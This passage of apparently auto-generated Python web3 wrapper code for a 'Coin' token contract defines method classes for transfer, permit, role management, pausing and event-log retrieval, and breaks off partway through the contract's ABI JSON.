def build_transaction(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(owner, spender, value, deadline, v, r, s) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender, value, deadline, v, r, s).buildTransaction(tx_params.as_dict())
def estimate_gas(self, owner: str, spender: str, value: int, deadline: int, v: int, r: Union[bytes, str], s: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(owner, spender, value, deadline, v, r, s) = self.validate_and_normalize_inputs(
owner, spender, value, deadline, v, r, s)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender, value, deadline, v, r, s).estimateGas(tx_params.as_dict())
class RenounceRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the renounceRole method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
"""Validate the inputs to the renounceRole method."""
self.validator.assert_valid(
method_name='renounceRole',
parameter_name='role',
argument_value=role,
)
self.validator.assert_valid(
method_name='renounceRole',
parameter_name='account',
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(tx_params.as_dict())
class RevokeRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the revokeRole method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str], account: str):
"""Validate the inputs to the revokeRole method."""
self.validator.assert_valid(
method_name='revokeRole',
parameter_name='role',
argument_value=role,
)
self.validator.assert_valid(
method_name='revokeRole',
parameter_name='account',
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(tx_params.as_dict())
def build_transaction(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(tx_params.as_dict())
def estimate_gas(self, role: Union[bytes, str], account: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(tx_params.as_dict())
class SetContractUriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setContractURI method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, uri: str):
"""Validate the inputs to the setContractURI method."""
self.validator.assert_valid(
method_name='setContractURI',
parameter_name='_URI',
argument_value=uri,
)
return (uri)
def call(self, uri: str, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(uri).call(tx_params.as_dict())
def send_transaction(self, uri: str, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).transact(tx_params.as_dict())
def build_transaction(self, uri: str, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).buildTransaction(tx_params.as_dict())
def estimate_gas(self, uri: str, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(uri) = self.validate_and_normalize_inputs(uri)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(uri).estimateGas(tx_params.as_dict())
class SetRestrictedTransferMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the setRestrictedTransfer method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, restricted_transfer: bool):
"""Validate the inputs to the setRestrictedTransfer method."""
self.validator.assert_valid(
method_name='setRestrictedTransfer',
parameter_name='_restrictedTransfer',
argument_value=restricted_transfer,
)
return (restricted_transfer)
def call(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(restricted_transfer) = self.validate_and_normalize_inputs(
restricted_transfer)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(restricted_transfer).call(tx_params.as_dict())
def send_transaction(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(restricted_transfer) = self.validate_and_normalize_inputs(
restricted_transfer)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(restricted_transfer).transact(tx_params.as_dict())
def build_transaction(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(restricted_transfer) = self.validate_and_normalize_inputs(
restricted_transfer)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(restricted_transfer).buildTransaction(tx_params.as_dict())
def estimate_gas(self, restricted_transfer: bool, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(restricted_transfer) = self.validate_and_normalize_inputs(
restricted_transfer)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(restricted_transfer).estimateGas(tx_params.as_dict())
class SupportsInterfaceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the supportsInterface method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, interface_id: Union[bytes, str]):
"""Validate the inputs to the supportsInterface method."""
self.validator.assert_valid(
method_name='supportsInterface',
parameter_name='interfaceId',
argument_value=interface_id,
)
return (interface_id)
def call(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
interface_id).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).transact(tx_params.as_dict())
def build_transaction(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).buildTransaction(tx_params.as_dict())
def estimate_gas(self, interface_id: Union[bytes, str], tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(interface_id) = self.validate_and_normalize_inputs(interface_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(interface_id).estimateGas(tx_params.as_dict())
class SymbolMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the symbol method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class TotalSupplyMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the totalSupply method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class TransferMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the transfer method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, recipient: str, amount: int):
"""Validate the inputs to the transfer method."""
self.validator.assert_valid(
method_name='transfer',
parameter_name='recipient',
argument_value=recipient,
)
recipient = self.validate_and_checksum_address(recipient)
self.validator.assert_valid(
method_name='transfer',
parameter_name='amount',
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (recipient, amount)
def call(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(recipient, amount) = self.validate_and_normalize_inputs(recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
recipient, amount).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(recipient, amount) = self.validate_and_normalize_inputs(recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(recipient, amount).transact(tx_params.as_dict())
def build_transaction(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(recipient, amount) = self.validate_and_normalize_inputs(recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(recipient, amount).buildTransaction(tx_params.as_dict())
def estimate_gas(self, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(recipient, amount) = self.validate_and_normalize_inputs(recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(recipient, amount).estimateGas(tx_params.as_dict())
class TransferFromMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the transferFrom method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction, validator: Validator = None):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, sender: str, recipient: str, amount: int):
"""Validate the inputs to the transferFrom method."""
self.validator.assert_valid(
method_name='transferFrom',
parameter_name='sender',
argument_value=sender,
)
sender = self.validate_and_checksum_address(sender)
self.validator.assert_valid(
method_name='transferFrom',
parameter_name='recipient',
argument_value=recipient,
)
recipient = self.validate_and_checksum_address(recipient)
self.validator.assert_valid(
method_name='transferFrom',
parameter_name='amount',
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (sender, recipient, amount)
def call(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(sender, recipient, amount) = self.validate_and_normalize_inputs(
sender, recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(
sender, recipient, amount).call(tx_params.as_dict())
return bool(returned)
def send_transaction(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(sender, recipient, amount) = self.validate_and_normalize_inputs(
sender, recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sender, recipient, amount).transact(tx_params.as_dict())
def build_transaction(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
(sender, recipient, amount) = self.validate_and_normalize_inputs(
sender, recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sender, recipient, amount).buildTransaction(tx_params.as_dict())
def estimate_gas(self, sender: str, recipient: str, amount: int, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
(sender, recipient, amount) = self.validate_and_normalize_inputs(
sender, recipient, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(sender, recipient, amount).estimateGas(tx_params.as_dict())
class UnpauseMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the unpause method."""
def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method().call(tx_params.as_dict())
def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Coin:
"""Wrapper class for Coin Solidity contract."""
default_admin_role: DefaultAdminRoleMethod
"""Constructor-initialized instance of
:class:`DefaultAdminRoleMethod`.
"""
domain_separator: DomainSeparatorMethod
"""Constructor-initialized instance of
:class:`DomainSeparatorMethod`.
"""
minter_role: MinterRoleMethod
"""Constructor-initialized instance of
:class:`MinterRoleMethod`.
"""
pauser_role: PauserRoleMethod
"""Constructor-initialized instance of
:class:`PauserRoleMethod`.
"""
transfer_role: TransferRoleMethod
"""Constructor-initialized instance of
:class:`TransferRoleMethod`.
"""
contract_uri_: ContractUri_Method
"""Constructor-initialized instance of
:class:`ContractUri_Method`.
"""
allowance: AllowanceMethod
"""Constructor-initialized instance of
:class:`AllowanceMethod`.
"""
approve: ApproveMethod
"""Constructor-initialized instance of
:class:`ApproveMethod`.
"""
balance_of: BalanceOfMethod
"""Constructor-initialized instance of
:class:`BalanceOfMethod`.
"""
burn: BurnMethod
"""Constructor-initialized instance of
:class:`BurnMethod`.
"""
burn_from: BurnFromMethod
"""Constructor-initialized instance of
:class:`BurnFromMethod`.
"""
contract_uri: ContractUriMethod
"""Constructor-initialized instance of
:class:`ContractUriMethod`.
"""
decimals: DecimalsMethod
"""Constructor-initialized instance of
:class:`DecimalsMethod`.
"""
decrease_allowance: DecreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`DecreaseAllowanceMethod`.
"""
get_role_admin: GetRoleAdminMethod
"""Constructor-initialized instance of
:class:`GetRoleAdminMethod`.
"""
get_role_member: GetRoleMemberMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberMethod`.
"""
get_role_member_count: GetRoleMemberCountMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberCountMethod`.
"""
grant_role: GrantRoleMethod
"""Constructor-initialized instance of
:class:`GrantRoleMethod`.
"""
has_role: HasRoleMethod
"""Constructor-initialized instance of
:class:`HasRoleMethod`.
"""
increase_allowance: IncreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`IncreaseAllowanceMethod`.
"""
is_restricted_transfer: IsRestrictedTransferMethod
"""Constructor-initialized instance of
:class:`IsRestrictedTransferMethod`.
"""
is_trusted_forwarder: IsTrustedForwarderMethod
"""Constructor-initialized instance of
:class:`IsTrustedForwarderMethod`.
"""
mint: MintMethod
"""Constructor-initialized instance of
:class:`MintMethod`.
"""
name: NameMethod
"""Constructor-initialized instance of
:class:`NameMethod`.
"""
nonces: NoncesMethod
"""Constructor-initialized instance of
:class:`NoncesMethod`.
"""
pause: PauseMethod
"""Constructor-initialized instance of
:class:`PauseMethod`.
"""
paused: PausedMethod
"""Constructor-initialized instance of
:class:`PausedMethod`.
"""
permit: PermitMethod
"""Constructor-initialized instance of
:class:`PermitMethod`.
"""
renounce_role: RenounceRoleMethod
"""Constructor-initialized instance of
:class:`RenounceRoleMethod`.
"""
revoke_role: RevokeRoleMethod
"""Constructor-initialized instance of
:class:`RevokeRoleMethod`.
"""
set_contract_uri: SetContractUriMethod
"""Constructor-initialized instance of
:class:`SetContractUriMethod`.
"""
set_restricted_transfer: SetRestrictedTransferMethod
"""Constructor-initialized instance of
:class:`SetRestrictedTransferMethod`.
"""
supports_interface: SupportsInterfaceMethod
"""Constructor-initialized instance of
:class:`SupportsInterfaceMethod`.
"""
symbol: SymbolMethod
"""Constructor-initialized instance of
:class:`SymbolMethod`.
"""
total_supply: TotalSupplyMethod
"""Constructor-initialized instance of
:class:`TotalSupplyMethod`.
"""
transfer: TransferMethod
"""Constructor-initialized instance of
:class:`TransferMethod`.
"""
transfer_from: TransferFromMethod
"""Constructor-initialized instance of
:class:`TransferFromMethod`.
"""
unpause: UnpauseMethod
"""Constructor-initialized instance of
:class:`UnpauseMethod`.
"""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
validator: CoinValidator = None,
):
"""Get an instance of wrapper for smart contract.
:param web3_or_provider: Either an instance of `web3.Web3`:code: or
`web3.providers.base.BaseProvider`:code:
:param contract_address: where the contract has been deployed
:param validator: for validation of method inputs.
"""
# pylint: disable=too-many-statements
self.contract_address = contract_address
if not validator:
validator = CoinValidator(web3_or_provider, contract_address)
web3 = None
if isinstance(web3_or_provider, BaseProvider):
web3 = Web3(web3_or_provider)
elif isinstance(web3_or_provider, Web3):
web3 = web3_or_provider
else:
raise TypeError(
"Expected parameter 'web3_or_provider' to be an instance of either"
+ " Web3 or BaseProvider"
)
# if any middleware was imported, inject it
try:
MIDDLEWARE
except NameError:
pass
else:
try:
for middleware in MIDDLEWARE:
web3.middleware_onion.inject(
middleware['function'], layer=middleware['layer'],
)
except ValueError as value_error:
if value_error.args == ("You can't add the same un-named instance twice",):
pass
self._web3_eth = web3.eth
functions = self._web3_eth.contract(address=to_checksum_address(
contract_address), abi=Coin.abi()).functions
self.default_admin_role = DefaultAdminRoleMethod(
web3_or_provider, contract_address, functions.DEFAULT_ADMIN_ROLE)
self.domain_separator = DomainSeparatorMethod(
web3_or_provider, contract_address, functions.DOMAIN_SEPARATOR)
self.minter_role = MinterRoleMethod(
web3_or_provider, contract_address, functions.MINTER_ROLE)
self.pauser_role = PauserRoleMethod(
web3_or_provider, contract_address, functions.PAUSER_ROLE)
self.transfer_role = TransferRoleMethod(
web3_or_provider, contract_address, functions.TRANSFER_ROLE)
self.contract_uri_ = ContractUri_Method(
web3_or_provider, contract_address, functions._contractURI)
self.allowance = AllowanceMethod(
web3_or_provider, contract_address, functions.allowance, validator)
self.approve = ApproveMethod(
web3_or_provider, contract_address, functions.approve, validator)
self.balance_of = BalanceOfMethod(
web3_or_provider, contract_address, functions.balanceOf, validator)
self.burn = BurnMethod(
web3_or_provider, contract_address, functions.burn, validator)
self.burn_from = BurnFromMethod(
web3_or_provider, contract_address, functions.burnFrom, validator)
self.contract_uri = ContractUriMethod(
web3_or_provider, contract_address, functions.contractURI)
self.decimals = DecimalsMethod(
web3_or_provider, contract_address, functions.decimals)
self.decrease_allowance = DecreaseAllowanceMethod(
web3_or_provider, contract_address, functions.decreaseAllowance, validator)
self.get_role_admin = GetRoleAdminMethod(
web3_or_provider, contract_address, functions.getRoleAdmin, validator)
self.get_role_member = GetRoleMemberMethod(
web3_or_provider, contract_address, functions.getRoleMember, validator)
self.get_role_member_count = GetRoleMemberCountMethod(
web3_or_provider, contract_address, functions.getRoleMemberCount, validator)
self.grant_role = GrantRoleMethod(
web3_or_provider, contract_address, functions.grantRole, validator)
self.has_role = HasRoleMethod(
web3_or_provider, contract_address, functions.hasRole, validator)
self.increase_allowance = IncreaseAllowanceMethod(
web3_or_provider, contract_address, functions.increaseAllowance, validator)
self.is_restricted_transfer = IsRestrictedTransferMethod(
web3_or_provider, contract_address, functions.isRestrictedTransfer)
self.is_trusted_forwarder = IsTrustedForwarderMethod(
web3_or_provider, contract_address, functions.isTrustedForwarder, validator)
self.mint = MintMethod(
web3_or_provider, contract_address, functions.mint, validator)
self.name = NameMethod(
web3_or_provider, contract_address, functions.name)
self.nonces = NoncesMethod(
web3_or_provider, contract_address, functions.nonces, validator)
self.pause = PauseMethod(
web3_or_provider, contract_address, functions.pause)
self.paused = PausedMethod(
web3_or_provider, contract_address, functions.paused)
self.permit = PermitMethod(
web3_or_provider, contract_address, functions.permit, validator)
self.renounce_role = RenounceRoleMethod(
web3_or_provider, contract_address, functions.renounceRole, validator)
self.revoke_role = RevokeRoleMethod(
web3_or_provider, contract_address, functions.revokeRole, validator)
self.set_contract_uri = SetContractUriMethod(
web3_or_provider, contract_address, functions.setContractURI, validator)
self.set_restricted_transfer = SetRestrictedTransferMethod(
web3_or_provider, contract_address, functions.setRestrictedTransfer, validator)
self.supports_interface = SupportsInterfaceMethod(
web3_or_provider, contract_address, functions.supportsInterface, validator)
self.symbol = SymbolMethod(
web3_or_provider, contract_address, functions.symbol)
self.total_supply = TotalSupplyMethod(
web3_or_provider, contract_address, functions.totalSupply)
self.transfer = TransferMethod(
web3_or_provider, contract_address, functions.transfer, validator)
self.transfer_from = TransferFromMethod(
web3_or_provider, contract_address, functions.transferFrom, validator)
self.unpause = UnpauseMethod(
web3_or_provider, contract_address, functions.unpause)
def get_approval_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Approval event.
:param tx_hash: hash of transaction emitting Approval event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.Approval().processReceipt(tx_receipt)
def get_paused_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Paused event.
:param tx_hash: hash of transaction emitting Paused event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.Paused().processReceipt(tx_receipt)
def get_role_admin_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleAdminChanged event.
:param tx_hash: hash of transaction emitting RoleAdminChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.RoleAdminChanged().processReceipt(tx_receipt)
def get_role_granted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleGranted event.
:param tx_hash: hash of transaction emitting RoleGranted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.RoleGranted().processReceipt(tx_receipt)
def get_role_revoked_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleRevoked event.
:param tx_hash: hash of transaction emitting RoleRevoked event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.RoleRevoked().processReceipt(tx_receipt)
def get_transfer_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Transfer event.
:param tx_hash: hash of transaction emitting Transfer event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.Transfer().processReceipt(tx_receipt)
def get_unpaused_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Unpaused event.
:param tx_hash: hash of transaction emitting Unpaused event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.Unpaused().processReceipt(tx_receipt)
@staticmethod
def abi():
"""Return the ABI to the underlying contract."""
return json.loads(
'[{"inputs":[{"internalType":"address payable","name":"_controlCenter","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"address","name":"_trustedForwarder","type":"address"},{"internalType":"string","name":"_uri","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs